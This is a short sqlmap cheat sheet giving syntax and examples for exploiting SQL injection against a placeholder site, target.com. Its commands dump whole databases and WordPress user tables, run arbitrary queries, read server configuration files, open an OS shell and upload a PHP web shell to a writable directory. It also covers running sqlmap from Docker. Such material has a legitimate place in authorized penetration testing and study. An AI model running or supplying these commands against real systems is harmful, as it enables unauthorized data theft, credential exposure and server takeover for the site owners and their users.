sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection.
Get DBMS banner
Sintaxis:
sqlmap <url> -p <parameter vulnerable> -b
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -b
Get current database name
Sintaxis
sqlmap <url> -p <parameter vulnerable> --current-db
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id --current-db
Get current username
Sintaxis:
sqlmap <url> -p <parameter vulnerable> --current-user
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id --current-user
Get the list of tables in a database
Sintaxis:
sqlmap <url> -p <parameter vulnerable> -D <database_name> --tables
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --tables
Get the list of columns in a table
Sintaxis:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --columns
Dump table information
Sintax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --dump
Dump ALL database information
Sintax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> --dump-all
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --dump-all
Spawn a Shell
For this you need to know a writable directory in the server, example /var/www/html/uploads/
Sintax:
sqlmap <url> -p <parameter_vulnerable> -D <database_name> --os-shell
Example:
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --os-shell
Uploading a shell
For this you need to know a writable directory in the server, example /var/www/html/uploads/
Sintax
sqlmap <url> --file-dest="<remoteDirectory>" --file-write="<yourLocalFile.php>"
Example
sqlmap http://target.com/vulnerable.php?id=123 -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"
Executing a Query
Sintax
sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>
Example
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_d --sql-query "Select * from wp_users;"
Downloading files from the server
Note, for this you need to know the file structure of server
Sintax
sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --file-read=<PathFile>
Example
sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --file-read=/var/www/html/dbConfig.php
Specify vulnerability in url params
Sintax
[*] asterisk symbol is used to specify the vulnerable parameter
sqlmap --url https://target.com/articles/*vulnerable-param
Docker Version
1.- Pull image from docker hub
docker pull paoloo/sqlmap
2.- Create directory for volume. (results will be saved in this directory)
mkdir /tmp/sqlmap
2.- Execute image in a temporal container
docker run --rm -it -v /tmp/sqlmap:/root/.sqlmap/ paoloo/sqlmap --url https://target.com/articles.php?id=1 -p id